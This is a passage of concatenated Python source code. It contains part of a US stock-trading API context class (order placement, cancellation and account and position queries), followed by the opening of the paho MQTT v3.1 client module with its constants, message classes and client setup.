LoginNewAccountQuery.unpack_rsp)
kargs = {'cookie': str(self.cookie),
'user_id': str(user_id),
'password_md5': str(login_password_md5)
}
        # switching accounts always drops the connection, so checking ret_code here is meaningless
try:
query_processor(**kargs)
except Exception as e:
pass
        # trigger a reconnect and wait for it to complete
        self.get_global_state()
        # next, unlock trading with the trade password
ret = RET_OK
data = ''
if trade_password or trade_password_md5:
ret, data = self.unlock_trade(trade_password, trade_password_md5)
else:
self._ctx_unlock = None
return ret, data
class OpenUSTradeContext(OpenContextBase):
"""Class for set context of US stock trade"""
cookie = 100000
def __init__(self, host="127.0.0.1", port=11111):
self._ctx_unlock = None
self._obj_order_sub = SafeTradeSubscribeList()
super(OpenUSTradeContext, self).__init__(host, port, True, True)
self.set_pre_handler(USTradeOrderPreHandler(self))
def close(self):
"""
        close the old object before creating a new one in a loop, otherwise the socket may hit error 10053 or similar!
"""
super(OpenUSTradeContext, self).close()
def on_api_socket_reconnected(self):
"""for api socket reconnected"""
# auto unlock
if self._ctx_unlock is not None:
for i in range(3):
password, password_md5 = self._ctx_unlock
ret, data = self.unlock_trade(password, password_md5)
if ret == RET_OK:
break
# auto subscribe order deal push
list_sub = self._obj_order_sub.copy()
dic_order = {}
list_zero_order_env = []
for (orderid, envtype) in list_sub:
if str(orderid) == u'':
list_zero_order_env.append(envtype)
continue
if envtype not in dic_order:
dic_order[envtype] = []
dic_order[envtype].append(orderid)
for envtype in dic_order:
self._subscribe_order_deal_push(dic_order[envtype], True, True, envtype)
        # use a blank orderid to subscribe to all orders
for envtype in list_zero_order_env:
self._subscribe_order_deal_push([], True, False, envtype)
def on_trade_order_check(self, orderid, envtype, status):
'''multi thread notify order finish after subscribe order push'''
if is_USTrade_order_status_finish(status):
self._obj_order_sub.del_val(orderid=orderid, envtype=envtype)
elif (not self._obj_order_sub.has_val(orderid, envtype)) and self._obj_order_sub.has_val(u'', envtype):
            self._obj_order_sub.add_val(orderid, envtype)  # record info for the blank-orderid subscription
def _subscribe_order_deal_push(self, orderid_list, order_deal_push=True, push_atonce=True, envtype=0):
"""subscribe order for recv push data"""
for orderid in orderid_list:
if order_deal_push is False:
self._obj_order_sub.del_val(orderid, envtype)
else:
self._obj_order_sub.add_val(orderid, envtype)
ret_code, _, push_req_str = TradePushQuery.us_pack_subscribe_req(
str(self.cookie), str(envtype), orderid_list, str(int(order_deal_push)), str(int(push_atonce)))
if ret_code == RET_OK:
ret_code, _ = self._send_async_req(push_req_str)
return ret_code
def unlock_trade(self, password, password_md5=None):
        '''
        Unlock trading. For security, every trade API can only be used after a successful unlock.
        :param password: plain-text password string (either this or password_md5)
        :param password_md5: md5 string of the password (either this or password)
        :return: (ret, data). When ret == 0, data is None;
                 when ret != 0, data is an error string.
        '''
query_processor = self._get_sync_query_processor(UnlockTrade.pack_req,
UnlockTrade.unpack_rsp)
# the keys of kargs should be corresponding to the actual function arguments
kargs = {'cookie': str(self.cookie), 'password': str(password), 'password_md5': str(password_md5)}
ret_code, msg, unlock_list = query_processor(**kargs)
if ret_code != RET_OK:
return RET_ERROR, msg
# reconnected to auto unlock
if RET_OK == ret_code:
self._ctx_unlock = (password, password_md5)
# unlock push socket
ret_code, msg, push_req_str = UnlockTrade.pack_req(**kargs)
if ret_code == RET_OK:
self._send_async_req(push_req_str)
return RET_OK, None
def subscribe_order_deal_push(self, orderid_list, order_deal_push=True, envtype=0):
"""
subscribe_order_deal_push
"""
if not TRADE.check_envtype_us(envtype):
return RET_ERROR
list_sub = [u'']
if orderid_list is None:
list_sub = [u'']
elif isinstance(orderid_list, list):
list_sub = [str(x) for x in orderid_list]
else:
list_sub = [str(orderid_list)]
return self._subscribe_order_deal_push(list_sub, order_deal_push, True, envtype)
def place_order(self, price, qty, strcode, orderside, ordertype=2, envtype=0, order_deal_push=False):
"""
place order
use set_handle(USTradeOrderHandlerBase) to recv order push !
"""
if not TRADE.check_envtype_us(envtype):
error_str = ERROR_STR_PREFIX + "us stocks temporarily only support real trading "
return RET_ERROR, error_str
ret_code, content = split_stock_str(str(strcode))
if ret_code == RET_ERROR:
error_str = content
return RET_ERROR, error_str, None
market_code, stock_code = content
if int(market_code) != 2:
error_str = ERROR_STR_PREFIX + "the type of stocks is wrong "
return RET_ERROR, error_str
query_processor = self._get_sync_query_processor(PlaceOrder.us_pack_req,
PlaceOrder.us_unpack_rsp)
# the keys of kargs should be corresponding to the actual function arguments
kargs = {'cookie': str(self.cookie), 'envtype': str(envtype), 'orderside': str(orderside),
'ordertype': str(ordertype), 'price': str(price), 'qty': str(qty), 'strcode': str(stock_code)}
ret_code, msg, place_order_list = query_processor(**kargs)
if ret_code != RET_OK:
return RET_ERROR, msg
# handle order push
self._subscribe_order_deal_push(orderid_list=[place_order_list[0]['orderid']],
order_deal_push=order_deal_push, envtype=envtype)
col_list = ["envtype", "orderid", "code", "stock_name", "dealt_avg_price", "dealt_qty", "qty",
"order_type", "order_side", "price", "status", "submited_time", "updated_time"]
place_order_table = pd.DataFrame(place_order_list, columns=col_list)
return RET_OK, place_order_table
def set_order_status(self, status=0, orderid=0, envtype=0):
"""for setting the statusof order"""
if not TRADE.check_envtype_us(envtype):
error_str = ERROR_STR_PREFIX + "us stocks temporarily only support real trading "
return RET_ERROR, error_str
if int(status) != 0:
error_str = ERROR_STR_PREFIX + "us stocks temporarily only support cancel order "
return RET_ERROR, error_str
query_processor = self._get_sync_query_processor(SetOrderStatus.us_pack_req,
SetOrderStatus.us_unpack_rsp)
# the keys of kargs should be corresponding to the actual function arguments
kargs = {'cookie': str(self.cookie), 'envtype': str(envtype), 'localid': str(0),
'orderid': str(orderid), 'status': '0'}
ret_code, msg, set_order_list = query_processor(**kargs)
if ret_code != RET_OK:
return RET_ERROR, msg
col_list = ['envtype', 'orderID']
set_order_table = pd.DataFrame(set_order_list, columns=col_list)
return RET_OK, set_order_table
def change_order(self, price, qty, orderid=0, envtype=0):
"""for changing the order"""
if not TRADE.check_envtype_us(envtype):
error_str = ERROR_STR_PREFIX + "us stocks temporarily only support real trading "
return RET_ERROR, error_str
query_processor = self._get_sync_query_processor(ChangeOrder.us_pack_req,
ChangeOrder.us_unpack_rsp)
# the keys of kargs should be corresponding to the actual function arguments
kargs = {'cookie': str(self.cookie), 'envtype': str(envtype), 'localid': str(0),
'orderid': str(orderid), 'price': str(price), 'qty': str(qty)}
ret_code, msg, change_order_list = query_processor(**kargs)
if ret_code != RET_OK:
return RET_ERROR, msg
col_list = ['envtype', 'orderID']
change_order_table = pd.DataFrame(change_order_list, columns=col_list)
return RET_OK, change_order_table
def accinfo_query(self, envtype=0):
"""for querying the information of account"""
if not TRADE.check_envtype_us(envtype):
error_str = ERROR_STR_PREFIX + "us stocks temporarily only support real trading "
return RET_ERROR, error_str
query_processor = self._get_sync_query_processor(AccInfoQuery.us_pack_req,
AccInfoQuery.us_unpack_rsp)
# the keys of kargs should be corresponding to the actual function arguments
kargs = {'cookie': str(self.cookie), 'envtype': str(envtype)}
ret_code, msg, accinfo_list = query_processor(**kargs)
if ret_code != RET_OK:
return RET_ERROR, msg
col_list = ['Power', 'ZCJZ', 'ZQSZ', 'XJJY', 'KQXJ', 'DJZJ', 'ZSJE', 'ZGJDE', 'YYJDE', 'GPBZJ']
accinfo_frame_table = pd.DataFrame(accinfo_list, columns=col_list)
return RET_OK, accinfo_frame_table
def order_list_query(self, orderid="", statusfilter="", strcode='', start='', end='', envtype=0):
"""for querying order list"""
if not TRADE.check_envtype_us(envtype):
error_str = ERROR_STR_PREFIX + "us stocks temporarily only support real trading "
return RET_ERROR, error_str
stock_code = ''
if strcode != '':
ret_code, content = split_stock_str(str(strcode))
if ret_code == RET_ERROR:
return RET_ERROR, content
_, stock_code = content
query_processor = self._get_sync_query_processor(OrderListQuery.us_pack_req,
OrderListQuery.us_unpack_rsp)
# the keys of kargs should be corresponding to the actual function arguments
kargs = {'cookie': str(self.cookie),
'orderid': str(orderid),
'statusfilter': str(statusfilter),
'strcode': str(stock_code),
'start': str(start),
'end': str(end),
'envtype': str(envtype)}
ret_code, msg, order_list = query_processor(**kargs)
if ret_code != RET_OK:
return RET_ERROR, msg
col_list = ["code", "stock_name", "dealt_avg_price", "dealt_qty", "qty",
"orderid", "order_type", "order_side", "price",
"status", "submited_time", "updated_time"]
order_list_table = pd.DataFrame(order_list, columns=col_list)
return RET_OK, order_list_table
def position_list_query(self, strcode='', stocktype='', pl_ratio_min='',
pl_ratio_max='', envtype=0):
"""for querying the position"""
if not TRADE.check_envtype_us(envtype):
error_str = ERROR_STR_PREFIX + "us stocks temporarily only support real trading "
return RET_ERROR, error_str
stock_code = ''
if strcode != '':
ret_code, content = split_stock_str(str(strcode))
if ret_code == RET_ERROR:
return RET_ERROR, content
_, stock_code = content
query_processor = self._get_sync_query_processor(PositionListQuery.us_pack_req,
PositionListQuery.us_unpack_rsp)
# the keys of kargs should be corresponding to the actual function arguments
kargs = {'cookie': str(self.cookie),
'strcode': str(stock_code),
'stocktype': str(stocktype),
'pl_ratio_min': str(pl_ratio_min),
'pl_ratio_max': str(pl_ratio_max),
'envtype': str(envtype)}
ret_code, msg, position_list = query_processor(**kargs)
if ret_code != RET_OK:
return RET_ERROR, msg
col_list = ["code", "stock_name", "qty", "can_sell_qty", "cost_price",
"cost_price_valid", "market_val", "nominal_price", "pl_ratio",
"pl_ratio_valid", "pl_val", "pl_val_valid", "today_buy_qty",
"today_buy_val", "today_pl_val", "today_sell_qty", "today_sell_val"]
position_list_table = pd.DataFrame(position_list, columns=col_list)
return RET_OK, position_list_table
def deal_list_query(self, envtype=0):
"""for querying the deal list"""
if not TRADE.check_envtype_us(envtype):
error_str = ERROR_STR_PREFIX + "us stocks temporarily only support real trading "
return RET_ERROR, error_str
query_processor = self._get_sync_query_processor(DealListQuery.us_pack_req,
DealListQuery.us_unpack_rsp)
# the keys of kargs should be corresponding to the actual function arguments
kargs = {'cookie': str(self.cookie), 'envtype': str(envtype)}
ret_code, msg, deal_list = query_processor(**kargs)
if ret_code != RET_OK:
return RET_ERROR, msg
#"orderside" 保留是为了兼容旧版本, 对外文档统一为"order_side"
col_list = ["code", "stock_name", "dealid", "orderid",
"qty", "price", "orderside", "time", "order_side"]
deal_list_table = pd.DataFrame(deal_list, columns=col_list)
return RET_OK, deal_list_table
def history_order_list_query(self, statusfilter='', strcode='', start='', end='', envtype=0):
"""for querying order list"""
if not TRADE.check_envtype_us(envtype):
error_str = ERROR_STR_PREFIX + "us stocks temporarily only support real trading "
return RET_ERROR, error_str
stock_code = ''
if strcode != '':
ret_code, content = split_stock_str(str(strcode))
if ret_code == RET_ERROR:
return RET_ERROR, content
_, stock_code = content
query_processor = self._get_sync_query_processor(HistoryOrderListQuery.us_pack_req,
HistoryOrderListQuery.us_unpack_rsp)
# the keys of kargs should be corresponding to the actual function arguments
kargs = {'cookie': str(self.cookie),
'statusfilter': str(statusfilter),
'strcode': str(stock_code),
'start': str(start),
'end': str(end),
'envtype': str(envtype)}
ret_code, msg, order_list = query_processor(**kargs)
if ret_code != RET_OK:
return RET_ERROR, msg
col_list = ["code", "stock_name", "dealt_qty", "qty",
"orderid", "order_type", "order_side", "price",
"status", "submited_time", "updated_time"]
order_list_table = pd.DataFrame(order_list, columns=col_list)
return RET_OK, order_list_table
def history_deal_list_query(self, strcode, start, end, envtype=0):
"""for querying deal list"""
if not TRADE.check_envtype_us(envtype):
error_str = ERROR_STR_PREFIX + "the type of environment param is wrong "
return RET_ERROR, error_str
stock_code = ''
if strcode != '':
ret_code, content = split_stock_str(str(strcode))
if ret_code == RET_ERROR:
return RET_ERROR, content
_, stock_code = content
query_processor = self._get_sync_query_processor(HistoryDealListQuery.us_pack_req,
HistoryDealListQuery.us_unpack_rsp)
# the keys of kargs should be corresponding to the actual function arguments
kargs = {'cookie': str(self.cookie),
'strcode': str(stock_code),
'start': str(start),
'end': str(end),
'envtype': str(envtype)}
ret_code, msg, deal_list = query_processor(**kargs)
if ret_code != RET_OK:
return RET_ERROR, msg
col_list = ["code", "stock_name", "dealid", "orderid",
"qty", "price", "order_side", "time"]
deal_list_table = pd.DataFrame(deal_list, columns=col_list)
return RET_OK, deal_list_table
client.py
# Copyright (c) 2012-2014 Roger Light <roger@atchoo.org>
#
# All rights reserved. This program and the accompanying materials
# are made available under the terms of the Eclipse Public License v1.0
# and Eclipse Distribution License v1.0 which accompany this distribution.
#
# The Eclipse Public License is available at
# http://www.eclipse.org/legal/epl-v10.html
# and the Eclipse Distribution License is available at
# http://www.eclipse.org/org/documents/edl-v10.php.
#
# Contributors:
# Roger Light - initial API and implementation
"""
This is an MQTT v3.1 client module. MQTT is a lightweight pub/sub messaging
protocol that is easy to implement and suitable for low powered devices.
"""
import collections
import errno
import os
import platform
import select
import socket
try:
import ssl
except ImportError:
ssl = None
import struct
import sys
import threading
import time
import uuid
import base64
import string
import hashlib
import logging
try:
# Use monotonic clock if available
time_func = time.monotonic
except AttributeError:
time_func = time.time
try:
import dns.resolver
except ImportError:
HAVE_DNS = False
else:
HAVE_DNS = True
from .matcher import MQTTMatcher
if platform.system() == 'Windows':
EAGAIN = errno.WSAEWOULDBLOCK
else:
EAGAIN = errno.EAGAIN
MQTTv31 = 3
MQTTv311 = 4
if sys.version_info[0] >= 3:
# define some alias for python2 compatibility
unicode = str
basestring = str
# Message types
CONNECT = 0x10
CONNACK = 0x20
PUBLISH = 0x30
PUBACK = 0x40
PUBREC = 0x50
PUBREL = 0x60
PUBCOMP = 0x70
SUBSCRIBE = 0x80
SUBACK = 0x90
UNSUBSCRIBE = 0xA0
UNSUBACK = 0xB0
PINGREQ = 0xC0
PINGRESP = 0xD0
DISCONNECT = 0xE0
# Log levels
MQTT_LOG_INFO = 0x01
MQTT_LOG_NOTICE = 0x02
MQTT_LOG_WARNING = 0x04
MQTT_LOG_ERR = 0x08
MQTT_LOG_DEBUG = 0x10
LOGGING_LEVEL = {
MQTT_LOG_DEBUG: logging.DEBUG,
MQTT_LOG_INFO: logging.INFO,
MQTT_LOG_NOTICE: logging.INFO, # This has no direct equivalent level
MQTT_LOG_WARNING: logging.WARNING,
MQTT_LOG_ERR: logging.ERROR,
}
# CONNACK codes
CONNACK_ACCEPTED = 0
CONNACK_REFUSED_PROTOCOL_VERSION = 1
CONNACK_REFUSED_IDENTIFIER_REJECTED = 2
CONNACK_REFUSED_SERVER_UNAVAILABLE = 3
CONNACK_REFUSED_BAD_USERNAME_PASSWORD = 4
CONNACK_REFUSED_NOT_AUTHORIZED = 5
# Connection state
mqtt_cs_new = 0
mqtt_cs_connected = 1
mqtt_cs_disconnecting = 2
mqtt_cs_connect_async = 3
# Message state
mqtt_ms_invalid = 0
mqtt_ms_publish = 1
mqtt_ms_wait_for_puback = 2
mqtt_ms_wait_for_pubrec = 3
mqtt_ms_resend_pubrel = 4
mqtt_ms_wait_for_pubrel = 5
mqtt_ms_resend_pubcomp = 6
mqtt_ms_wait_for_pubcomp = 7
mqtt_ms_send_pubrec = 8
mqtt_ms_queued = 9
# Error values
MQTT_ERR_AGAIN = -1
MQTT_ERR_SUCCESS = 0
MQTT_ERR_NOMEM = 1
MQTT_ERR_PROTOCOL = 2
MQTT_ERR_INVAL = 3
MQTT_ERR_NO_CONN = 4
MQTT_ERR_CONN_REFUSED = 5
MQTT_ERR_NOT_FOUND = 6
MQTT_ERR_CONN_LOST = 7
MQTT_ERR_TLS = 8
MQTT_ERR_PAYLOAD_SIZE = 9
MQTT_ERR_NOT_SUPPORTED = 10
MQTT_ERR_AUTH = 11
MQTT_ERR_ACL_DENIED = 12
MQTT_ERR_UNKNOWN = 13
MQTT_ERR_ERRNO = 14
MQTT_ERR_QUEUE_SIZE = 15
MQTT_CLIENT = 0
MQTT_BRIDGE = 1
sockpair_data = b"0"
class WebsocketConnectionError(ValueError):
pass
class WouldBlockError(Exception):
pass
def error_string(mqtt_errno):
"""Return the error string associated with an mqtt error number."""
if mqtt_errno == MQTT_ERR_SUCCESS:
return "No error."
elif mqtt_errno == MQTT_ERR_NOMEM:
return "Out of memory."
elif mqtt_errno == MQTT_ERR_PROTOCOL:
return "A network protocol error occurred when communicating with the broker."
elif mqtt_errno == MQTT_ERR_INVAL:
return "Invalid function arguments provided."
elif mqtt_errno == MQTT_ERR_NO_CONN:
return "The client is not currently connected."
elif mqtt_errno == MQTT_ERR_CONN_REFUSED:
return "The connection was refused."
elif mqtt_errno == MQTT_ERR_NOT_FOUND:
return "Message not found (internal error)."
elif mqtt_errno == MQTT_ERR_CONN_LOST:
return "The connection was lost."
elif mqtt_errno == MQTT_ERR_TLS:
return "A TLS error occurred."
elif mqtt_errno == MQTT_ERR_PAYLOAD_SIZE:
return "Payload too large."
elif mqtt_errno == MQTT_ERR_NOT_SUPPORTED:
return "This feature is not supported."
elif mqtt_errno == MQTT_ERR_AUTH:
return "Authorisation failed."
elif mqtt_errno == MQTT_ERR_ACL_DENIED:
return "Access denied by ACL."
elif mqtt_errno == MQTT_ERR_UNKNOWN:
return "Unknown error."
elif mqtt_errno == MQTT_ERR_ERRNO:
return "Error defined by errno."
else:
return "Unknown error."
def connack_string(connack_code):
"""Return the string associated with a CONNACK result."""
if connack_code == CONNACK_ACCEPTED:
return "Connection Accepted."
elif connack_code == CONNACK_REFUSED_PROTOCOL_VERSION:
return "Connection Refused: unacceptable protocol version."
elif connack_code == CONNACK_REFUSED_IDENTIFIER_REJECTED:
return "Connection Refused: identifier rejected."
elif connack_code == CONNACK_REFUSED_SERVER_UNAVAILABLE:
return "Connection Refused: broker unavailable."
elif connack_code == CONNACK_REFUSED_BAD_USERNAME_PASSWORD:
return "Connection Refused: bad user name or password."
elif connack_code == CONNACK_REFUSED_NOT_AUTHORIZED:
return "Connection Refused: not authorised."
else:
return "Connection Refused: unknown reason."
def base62(num, base=string.digits + string.ascii_letters, padding=1):
"""Convert a number to base-62 representation."""
assert num >= 0
digits = []
while num:
num, rest = divmod(num, 62)
digits.append(base[rest])
digits.extend(base[0] for _ in range(len(digits), padding))
return ''.join(reversed(digits))
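# A few worked values for base62() (added for illustration, not in the original source):
#   base62(0)  == '0'    (padding fills with the zero digit)
#   base62(61) == 'Z'    (the last symbol of digits + ascii_letters)
#   base62(62) == '10'
# It is used further below to derive a client id from uuid.uuid4().int when none is supplied.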
def topic_matches_sub(sub, topic):
"""Check whether a topic matches a subscription.
For example:
foo/bar would match the subscription foo/# or +/bar
non/matching would not match the subscription non/+/+
"""
matcher = MQTTMatcher()
matcher[sub] = True
try:
next(matcher.iter_match(topic))
return True
except StopIteration:
return False
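# Hedged usage sketch (added for illustration), mirroring the docstring examples above:
#
#     topic_matches_sub('foo/#', 'foo/bar')         # -> True
#     topic_matches_sub('+/bar', 'foo/bar')         # -> True
#     topic_matches_sub('non/+/+', 'non/matching')  # -> False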
def _socketpair_compat():
"""TCP/IP socketpair including Windows support"""
listensock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_IP)
listensock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
listensock.bind(("127.0.0.1", 0))
listensock.listen(1)
iface, port = listensock.getsockname()
sock1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_IP)
sock1.setblocking(0)
try:
sock1.connect(("127.0.0.1", port))
except socket.error as err:
if err.errno != errno.EINPROGRESS and err.errno != errno.EWOULDBLOCK and err.errno != EAGAIN:
raise
sock2, address = listensock.accept()
sock2.setblocking(0)
listensock.close()
return (sock1, sock2)
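# Note (added for clarity): the pair returned above acts as a self-pipe for the client; writing
# sockpair_data to one end wakes up the select() in the network loop so that queued outgoing
# packets are noticed promptly. A plain socket.socketpair() cannot be relied on here because it
# is not available on Windows.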
class MQTTMessageInfo(object):
"""This is a class returned from Client.publish() and can be used to find
out the mid of the message that was published, and to determine whether the
message has been published, and/or wait until it is published.
"""
__slots__ = 'mid', '_published', '_condition', 'rc', '_iterpos'
def __init__(self, mid):
self.mid = mid
self._published = False
self._condition = threading.Condition()
self.rc = 0
self._iterpos = 0
def __str__(self):
return str((self.rc, self.mid))
def __iter__(self):
self._iterpos = 0
return self
def __next__(self):
return self.next()
def next(self):
if self._iterpos == 0:
self._iterpos = 1
return self.rc
elif self._iterpos == 1:
self._iterpos = 2
return self.mid
else:
raise StopIteration
def __getitem__(self, index):
if index == 0:
return self.rc
elif index == 1:
return self.mid
else:
raise IndexError("index out of range")
def _set_as_published(self):
with self._condition:
self._published = True
self._condition.notify()
def wait_for_publish(self):
"""Block until the message associated with this object is published."""
if self.rc == MQTT_ERR_QUEUE_SIZE:
raise ValueError('Message is not queued due to ERR_QUEUE_SIZE')
with self._condition:
while not self._published:
self._condition.wait()
def is_published(self):
"""Returns True if the message associated with this object has been
published, else returns False."""
if self.rc == MQTT_ERR_QUEUE_SIZE:
raise ValueError('Message is not queued due to ERR_QUEUE_SIZE')
with self._condition:
return self._published
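# Hedged usage sketch (added for illustration), based on the class docstring above; `client`
# stands for a connected Client instance, and the topic/payload are placeholders:
#
#     info = client.publish('some/topic', 'payload', qos=1)   # returns an MQTTMessageInfo
#     info.wait_for_publish()                                  # block until the broker has it
#     print(info.mid, info.is_published())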
class MQTTMessage(object):
""" This is a class that describes an incoming or outgoing message. It is
passed to the on_message callback as the message parameter.
Members:
topic : String/bytes. topic that the message was published on.
payload : String/bytes the message payload.
qos : Integer. The message Quality of Service 0, 1 or 2.
retain : Boolean. If true, the message is a retained message and not fresh.
mid : Integer. The message id.
On Python 3, topic must be bytes.
"""
__slots__ = 'timestamp', 'state', 'dup', 'mid', '_topic', 'payload', 'qos', 'retain', 'info'
def __init__(self, mid=0, topic=b""):
self.timestamp = 0
self.state = mqtt_ms_invalid
self.dup = False
self.mid = mid
self._topic = topic
self.payload = b""
self.qos = 0
self.retain = False
self.info = MQTTMessageInfo(mid)
def __eq__(self, other):
"""Override the default Equals behavior"""
if isinstance(other, self.__class__):
return self.mid == other.mid
return False
def __ne__(self, other):
"""Define a non-equality test"""
return not self.__eq__(other)
@property
def topic(self):
return self._topic.decode('utf-8')
@topic.setter
def topic(self, value):
self._topic = value
class Client(object):
"""MQTT version 3.1/3.1.1 client class.
This is the main class for use communicating with an MQTT broker.
General usage flow:
* Use connect()/connect_async() to connect to a broker
* Call loop() frequently to maintain network traffic flow with the broker
* Or use loop_start() to set a thread running to call loop() for you.
    * Or use loop_forever() to handle calling loop() for you in a blocking
      function.
* Use subscribe() to subscribe to a topic and receive messages
* Use publish() to send messages
* Use disconnect() to disconnect from the broker
Data returned from the broker is made available with the use of callback
functions as described below.
Callbacks
=========
A number of callback functions are available to receive data back from the
broker. To use a callback, define a function and then assign it to the
client:
def on_connect(client, userdata, flags, rc):
print("Connection returned " + str(rc))
client.on_connect = on_connect
    All of the callbacks as described below have a "client" and a "userdata"
argument. "client" is the Client instance that is calling the callback.
"userdata" is user data of any type and can be set when creating a new client
instance or with user_data_set(userdata).
The callbacks:
on_connect(client, userdata, flags, rc): called when the broker responds to our connection
request.
flags is a dict that contains response flags from the broker:
flags['session present'] - this flag is useful for clients that are
using clean session set to 0 only. If a client with clean
session=0, that reconnects to a broker that it has previously
connected to, this flag indicates whether the broker still has the
session information for the client. If 1, the session still exists.
The value of rc determines success or not:
0: Connection successful
1: Connection refused - incorrect protocol version
2: Connection refused - invalid client identifier
3: Connection refused - server unavailable
4: Connection refused - bad username or password
5: Connection refused - not authorised
6-255: Currently unused.
on_disconnect(client, userdata, rc): called when the client disconnects from the broker.
The rc parameter indicates the disconnection state. If MQTT_ERR_SUCCESS
(0), the callback was called in response to a disconnect() call. If any
other value the disconnection was unexpected, such as might be caused by
a network error.
on_message(client, userdata, message): called when a message has been received on a
topic that the client subscribes to. The message variable is a
MQTTMessage that describes all of the message parameters.
on_publish(client, userdata, mid): called when a message that was to be sent using the
publish() call has completed transmission to the broker. For messages
with QoS levels 1 and 2, this means that the appropriate handshakes have
completed. For QoS 0, this simply means that the message has left the
client. The mid variable matches the mid variable returned from the
corresponding publish() call, to allow outgoing messages to be tracked.
This callback is important because even if the publish() call returns
success, it does not always mean that the message has been sent.
on_subscribe(client, userdata, mid, granted_qos): called when the broker responds to a
subscribe request. The mid variable matches the mid variable returned
from the corresponding subscribe() call. The granted_qos variable is a
list of integers that give the QoS level the broker has granted for each
of the different subscription requests.
on_unsubscribe(client, userdata, mid): called when the broker responds to an unsubscribe
request. The mid variable matches the mid variable returned from the
corresponding unsubscribe() call.
on_log(client, userdata, level, buf): called when the client has log information. Define
to allow debugging. The level variable gives the severity of the message
and will be one of MQTT_LOG_INFO, MQTT_LOG_NOTICE, MQTT_LOG_WARNING,
MQTT_LOG_ERR, and MQTT_LOG_DEBUG. The message itself is in buf.
on_socket_open(client, userdata, sock): Called when the socket has been opened. Use this
to register the socket with an external event loop for reading.
on_socket_close(client, userdata, sock): Called when the socket is about to be closed.
Use this to unregister a socket from an external event loop for reading.
on_socket_register_write(client, userdata, sock): Called when a write operation to the
socket failed because it would have blocked, e.g. output buffer full. Use this to
register the socket with an external event loop for writing.
on_socket_unregister_write(client, userdata, sock): Called when a write operation to the
socket succeeded after it had previously failed. Use this to unregister the socket
from an external event loop for writing.
"""
def __init__(self, client_id="", clean_session=True, userdata=None,
protocol=MQTTv311, transport="tcp"):
"""client_id is the unique client id string used when connecting to the
broker. If client_id is zero length or None, then the behaviour is
defined by which protocol version is in use. If using MQTT v3.1.1, then
a zero length client id will be sent to the broker and the broker will
        generate a random id for the client. If using MQTT v3.1 then an id will be
randomly generated. In both cases, clean_session must be True. If this
is not the case a ValueError will be raised.
clean_session is a boolean that determines the client type. If True,
the broker will remove all information about this client when it
disconnects. If False, the client is a persistent client and
subscription information and queued messages will be retained when the
client disconnects.
Note that a client will never discard its own outgoing messages on
disconnect. Calling connect() or reconnect() will cause the messages to
be resent. Use reinitialise() to reset a client to its original state.
userdata is user defined data of any type that is passed as the "userdata"
parameter to callbacks. It may be updated at a later point with the
user_data_set() function.
The protocol argument allows explicit setting of the MQTT version to
use for this client. Can be paho.mqtt.client.MQTTv311 (v3.1.1) or
        paho.mqtt.client.MQTTv31 (v3.1), with the default being v3.1.1. If the
broker reports that the client connected with an invalid protocol
version, the client will automatically attempt to reconnect using v3.1
instead.
Set transport to "websockets" to use WebSockets as the transport
mechanism. Set to "tcp" to use raw TCP, which is the default.
"""
if not clean_session and (client_id == "" or client_id is None):
raise ValueError('A client id must be provided if clean session is False.')
if transport.lower() not in ('websockets', 'tcp'):
raise ValueError('transport must be "websockets" or "tcp", not %s' % transport)
self._transport = transport.lower()
self._protocol = protocol
self._userdata = userdata
self._sock = None
self._sockpairR, self._sockpairW = _socketpair_compat()
self._keepalive = 60
self._message_retry = 20
self._last_retry_check = 0
self._clean_session = clean_session
self._client_mode = MQTT_CLIENT
# [MQTT-3.1.3-4] Client Id must be UTF-8 encoded string.
if client_id == "" or client_id is None:
if protocol == MQTTv31:
self._client_id = base62(uuid.uuid4().int, padding=22)
else:
self._client_id = b""
else:
self._client_id = client_id
if isinstance(self._client_id, unicode):
self._client_id = self._client_id.encode('utf-8')
self._username = None
self._password = None
self._in_packet = {
"command": 0,
"have_remaining": 0,
"remaining_count": [],
"remaining_mult": 1,
"remaining_length": 0,
"packet": b"",
"to_process": 0,
"pos": 0}
self._out_packet = collections.deque()
self._current_out_packet = None
self._last_msg_in = time_func()
self._last_msg_out = time_func()
self._reconnect_min_delay = 1
self._reconnect_max_delay = 120
self._reconnect_delay = None
self._ping_t = 0
self._last_mid = 0
self._state = mqtt_cs_new
self._out_messages = collections.OrderedDict()
self._in_messages = collections.OrderedDict()
self._max_inflight_messages = 20
self._inflight_messages = 0
self._max_queued_messages = 0
self._will = False
self._will_topic = b""
self._will_payload = b""
self._will_qos = 0
self._will_retain = False
self._on_message_filtered = MQTTMatcher()
self._host = ""
self._port = 1883
self._bind_address = ""
self._in_callback_mutex = threading.Lock()
self._callback_mutex = threading.RLock()
self._out_packet_mutex = threading.Lock()
self._current_out_packet_mutex = threading.RLock()
self._msgtime_mutex = threading.Lock()
self._out_message_mutex = threading.RLock()
self._in_message_mutex = threading.Lock()
self._reconnect_delay_mutex = threading.Lock()
self._mid_generate_mutex = threading.Lock()
self._thread = None
self._thread_terminate = False
self._ssl = False
self._ssl_context = None
self._tls_insecure = False # Only used when SSL context does not have check_hostname attribute
self._logger = None
self._registered_write = False
# No default callbacks
self._on_log = None
self._on_connect = None
self._on_subscribe = None
self._on_message = None
self._on_publish = None
self._on_unsubscribe = None
self._on_disconnect = None
self._on_socket_open = None
self._on_socket_close = None
self._on_socket_register_write = None
self._on_socket_unregister_write = None
self._websocket_path = "/mqtt"
self._websocket_extra_headers = None
def __del__(self):
self._reset_sockets()
def _sock_recv(self, bufsize):
try:
return self._sock.recv(bufsize)
except socket.error as err:
if self._ssl and err.errno == ssl.SSL_ERROR_WANT_READ:
raise WouldBlockError()
if self._ssl and err.errno == ssl.SSL_ERROR_WANT_WRITE:
self._call_socket_register_write()
raise WouldBlockError()
if err.errno == EAGAIN:
raise WouldBlockError()
raise
def _sock_send(self, buf):
try:
return self._sock.send(buf)
except socket.error as err:
if self._ssl and err.errno == ssl.SSL_ERROR_WANT_READ:
raise WouldBlockError()
if self._ssl and err.errno == ssl.SSL_ERROR_WANT_WRITE:
self._call_socket_register_write()
raise WouldBlockError()
if err.errno == EAGAIN:
self._call_socket_register_write()
raise WouldBlockError()
raise
def _sock_close(self):
"""Close the connection to the server."""
if not self._sock:
return
try:
sock = self._sock
self._sock = None
self._call_socket_unregister_write(sock)
self._call_socket_close(sock)
finally:
# In case a callback fails, still close the socket to avoid leaking the file descriptor.
sock.close()
def _reset_sockets(self):
self._sock_close()
if self._sockpairR:
self._sockpairR.close()
self._sockpairR = None
if self._sockpairW:
